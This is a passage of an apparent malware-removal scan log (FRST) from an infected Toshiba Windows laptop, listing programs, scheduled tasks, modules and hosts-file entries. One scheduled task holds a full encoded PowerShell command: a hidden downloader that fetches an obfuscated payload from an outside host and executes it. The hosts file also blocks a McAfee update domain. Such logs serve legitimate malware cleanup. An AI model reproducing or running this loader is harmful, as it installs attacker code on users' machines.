TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version:  - )
Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation)
Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.)
Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation)
TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version:  - Agere Systems)
TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version:  - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent)
Windows Driver Package - TOSHIBA (FwLnk) System  (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION
Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION
Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.)
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION
Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] ()
Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGkAegA3ADkAWQBjAGsAcQB6AFEARABQAHAAagB4AFYAQwAxAE4AdgBjAHQAWQBXAHQAWQBlAG4AeABjAFUATgBLAHIAVABaAGYAZQBXAFIARwBCAHgAMwB5AHYAYgBpAGMARwB5ADMARABsAFgAOABkAEMAMQBiAHcARgBoAF8AdwB2AE4ATwAxAE4ANgBqAHoARQA4AFUAagAyAGoAawA1AHUAVwAyAFUAQwA1AHEAWQBOADQAdgBfAHcANABRADQAQwBiAEYAdgBaADcAcgB5AEsATAAwADYANwBKAEYATgBOAGcAVgB5AGYAQQBBAHQANgBnAEkAMQBZAGIAbQBHAFcAQQBoAGkATABxAGUAQQA3ADgAeAAtAF8ASwBRADYAMwBUAHMAdgB1AEsAcwBBAGgAaQB0AGQAQwBPAFAAOQBXADgAOQAyAFYATgBVAEMAcABaADAATAB5AGoASwB2AGYARABjAEcAcwB3AG0AdgBqAF8ANQBYAFIANwBDAGMAWQA2AC0AbwBUADAAQQAwAFUAOABpAFQAcgA2AFYASQBRAFYAdgByAE8AUABrAEUATABTAGsARQBSAFIAegB6AEgAQQBUAG0AcQBRAHgANwBPAGsAUQBFAE0AbQBWAG0ANQBlAGgAWgBnAFQAVQB2AGIAWQBlAHMATQBYAE4ANABLAEIATgBPAGcAYgBUAFQASABqAE8AZABuAHMARQBiAGQAMABpAFUAdgB1AEcAeAAyAEYATwBIAHoAQwBWAHYAQwB1AG0AdgAzAEQAVABLAHkAMwBQADIAMwBvADUAaABwAGcASQBYAFUASABvAGsAZwBKAEYAZwBkAFIAawBPAHAAYwBjAE4AZABoAFgASwBnAGgAVgBOAGkAZQAyAGQATQBIAHQAZgBuAGcAUgA0AFQARQBQAEkAagA4AGwAYwBoADYAYQB4AFMAMAB1AEoAWQBvAGMAWQBzAG4AeAB6AEYAVwBEAHQAeQB5AHYARAAxAGQASwBZAGcAUwA4AHkAQQBKAGcAcwBoAGkAVgBzADcARAB1AHgAcwBLAGIAdAB2ADUARABlAGgAcQBBAEQARAAzAG4AdgBZAE8AagBnAE0AdQBqAEMAcQBPAFQATwAtAEYAWABuAEoAOABUAG4ARwBxAG4AUAAyAGcASgBJAGoAYgA2AEcAYwBLADQAbABLADEAawAyAGMANwBGAGQAYQBTADYAMABfAHMAdAB5AEkAYgBJAC0AcQBQAHUAbwBOAGQAZwBkAFcAQgB6AC0AZAB5ADgAbwB4ADAAbgBnAGEAZgBVAHQAVABDAGsAdgBsADYAWgA5AHUAUQBrADMAMABYAGMAZwBoAFQAdwBuADgAUwByAFQAbQB1AGEAYgBtAEwANABOAEYAMABrAGIAYgAyAGcASwB5AEEAQgBNAHkAcgBFAEIAQwA4AFAAXwB2AFgAVABiAHEAbwBOAEQAZABVAGYANgB6AHUATABKADUATwBZAEcAOQBHAC0AdwBOAFIAMAA2ADEAMgA2AGEAaABZAHcAaQBvAFIANQBkAG0AUAAwAHEAZABkAHgAcQBsAGgAXwBxAGgAOAByAFYATABSAEMANgBnAHkAbgA1AF8ATQBOAE8AOABIADkAUQBlAEcAZAB0AEsAMwAxADQAcgA1AFIAYQBFAC0AWQBHAFgAdAAtAE4AQwBoAGcANwBMADkAbQBWAFMAZABiAHoAQwB3AG4AcABNAEoARABMADQAUgBVAEIAMABSAHkAZgBfAHEAegBWAG4ASQBDAHkAdQBlAFoAYQBoAEwAWgBEADQAcwA4AFIANQBtAGIAUQA4AE0AZQBMAHYAbgBFAG4ASABKAEkAQwBsAGcAMwBnAGgATgBNAGoAUABDAEQAMwBDAEYAVgBhAGsAMQBYAHAARwA4AEMASQBpADEAQgBnAE4AeQB0AGEAagAzAGIAbgBkAG8AeQBDAHgASwB1AG8AeABiAE0AQQB6AFgATABNAHQAaABjADkAbAA3ADMANgAxAGUAQwBoAHkAUAA4AHgAdQBOAEYAVwBWAGUAeABOAGoAawBzADEANwB5AFMAUgByADkAYwBxAEUATAByADYAUgByAFcAWAB1AFYATgAyADkANwBJADIANAB0ADEAcwBrAE8AcwBQAGcAawBUAE0ASQBDAEMAXwBqAHIAUgA4AHIAMwBxAFAANQAyAHYAdABNADIANQB5AHkAUABMAE8AeQBnADEAYQAwADAAVQBjAEYAYQBtAHIAWQBoAGsASQBPAHQATABTAFAAZQB6AE8ASAA5AG4AYQBjAEsARABqAHMAQwBkADYAYgBqAFkAagBDAFMAMgB2AFQAXwB5ADYAQgAzAFUAagBhAEQAaAAwADkARQBYAGIAeABhAFYAJgBjAD0AdAA2AG4AcwA4AEkAMABBAFMANgBqAGgASQBxADkAYQBqAGsAZwAzADkAYQB4AHMAWQBHAFgASgBnAHEARwA2ADcAOQBmAGwAQQBPAEYAbgBPAE0ANAAwAFEARAAxAFkANgBpAE0ARgBWADUAOAAxAEcAMgBPAEoAUQBOAHMAOAB0ADAAbgBNAGkAdwBzAE4ASgA0AE0AMwBZAGUAVgBmAEcAdQBfADYAYQBRAF8ARQBaAG4AMgBEAGIARABRAF8AVAB5AEwAMwBXAG8AdgBuAFYAOAA1AF8AZgBmAGwAOQBYAEYAbgBsAFAAeQBYAFEAOAByAGUAZQBhAGYANgB3AFIAZQBXAE0AUQBXAGkAagA2ADEAeAAtAFQAWABzAHEANgBCAFoAVgBpADIAMABaADQAVQBLAE8AeAB1AFcAbgBFAHUAeQBrAGQAaQBEAHIAYwA5AGgAVwBIAGYANwBjAG0AeABVAHAAawBLAG8ASgAtAHQAXwA2ADQAUgB0AFoATQA2ADQAYwA0AG8ARwAzAEcAaABjAHkAMQB0AFkARQBrAE4AXwB0AF8AQwBoADEAVgBDADMAdABIAFIAcABwAGsAZQBMADIAVQBjADkATgA3AF8AUQBhAFEASQBqADUARwA3AHkAMwBEAHUAMwB2AGIAXwB0AFkANwBmAFYAcgBTADMARQB5ADUANwB5AGUAWQBZAEgAaQBLAHgATwBPADQAQwBIAHoANABmAG4ARgBGADIAMABJAGkAagB1AHgAVABNAG4AaABBAEMAMwBCAHEASwAtAGcAXwBJAG0ANgBPAE0AQgBIAGwAZwAwAHYAZwBOAEQAWAAtADUAdQB4AGIATgBnAFMAeQBsAGUASwBjAFgAYgBQAHQAbgBpAGoAMQBnAEEAXwBtAGkALQBxAGQASwB3AHUAbgBvAF8AOQBLAG4AMwBPADkAQwBWAFYAVABSAC0AdQBTAFAAUgBLAEcAMwBIAEQATAB6AGgAWABQAEsAMABEADgATQBJADkAeQB5AE4AZgBIAFEAYQBWAE0AMwBuAC0AYQBiAGgAWQBpAFgASwBwADkATgA0AHgANgB2AEsAeABNAGYASQBrAEEARwB6ADIARABCAGkAeQA3AFcANgBVAHcAbQBjADUAaABmAGQASAB5AFUAUAA5AHQAagB0AEMAVwBvAE0AYQBuAFIAbwBRAFgAZwBYADgAdABFADAAdwAxAHIAVwBjAGUAYgBGADYAVgBkAG8AdgA4ADUANQBoAG8AYgBoAHIASgBKAEMAcAB6ADkATAB3AFkAYwBOAGkAdABlAEYAUQBqAHIAUAB0AGcAUQBoAGoAWgA2AFoAaQBiAGsARgBjAFgANAA4AFUAaABWAGUATABNAEEAUgBwAHMAbQBIAHYALQB3AGsAVwBqAHkANQBnAFUAdgB6AEcAOQBRAEUAbQA0AGMAYQBFAEMAWAB0ADMASQA1ADkAeQBhAEUAcQBoAFYAWQB5AHEAeQBmAEUAeQBuAF8AZAA3AHYANQBDADAATgA5AG8AQQBIAE4AeQByAF8AQwBVAFgATgBXAE4AdgA5AEMAbABVAGgATwAyAHIARQBRAFYAQQByAEEAcwBHAGEAUQBSADYAdABYAFIAVgA5AE0AVQAwAGEAMwBRAEcAUgBrAHkAcQBWADkAUABHAEEAUABRAEIAdABCAGsAaABQAHcARABVAGcAbQBOAEoAbQBSAFgANgBuAHAAcwBOAGgAcQBOAGYAMQBxAG8ARAA0AHkANwBwAFIAaAA1AGQAUgBpAHIAcwBaAHYAZAA1AGcAcgBqAGcASwBEAEMAMQBFAGoANwBPAG0AMwBXAGkAMQBwAGIAUgBfAHEAMwBRAEMAQQBlAFkATwA1ADkAdQBqAHkAVwB2AG4AdwA4ADIAdAAzAFgANwBPAE4AZwBMADkANwB0AC0AdwBNADMAWAAxAGoARwA0AGsAVQBsAEYAQQBtAHEAVwBxAHUAQgBpAHgAWAAxAFMAZgB1AEcATAA1ADAAQQBNAEkAbQBjAHAAOABqAGkAMABDAFgAaQBtADEAcQBaAGcASwBfAFIAdQB2AEYAcgA3ADUAcQBCAG4ASABpADYATgBZAF8AVwBmAFAAdgBtADgAMQBHAEQAOABWAHYAZgBFAEcAZABJAFMANgBkAEoAUgBRAG0ATwBvADgAUwBIAHEAdQBSAFoAegA0AEEAUQBjAGYATQBSAE0AaQBDAGoAawBVADcAcABTAFAAagBlAGMAZwA5AF8AUQBqAEcAUQBTAHcANABiAFcAVwBDAFgAXwA4AEQATgBSAEUAcgB5AGMAMgBQAFMARgB5AHkAMwBaAEcAdwBHAGYAeQBnAHEAUABiADMAQwB6AFoAVgBOAGIAUQA0AFMAcwBOAGQALQB5AEIAUQBYAFAANQBPADYAMwBVAFAAXwB3AG8AaQBuAGcARQBjAFIARwBEAEcAQQBrAFUAdQBNAEQASwBIAFEAbQAzAGsAVQBOAGcANQBlACYAcgA9ADQANAA4ADgANAAxADIANQA5ADEANAAxADkANAAyADQAMwA1ADYAIgA7ACQAcwB0AHMAawA9ACIAewA3AEUANwA4ADAARAA0ADcALQAwAEQAMABCAC0AMABFADAANQAtADAAOQAxADEALQAwAEYAMABDADAAOAAwAEEAMQAxADcARAB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASQBMAE8ASABGAFAASwBRACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION
Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION
Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe
Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION
Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION
Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll
2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll
2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll
2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll
2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll
2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx
2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1    mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

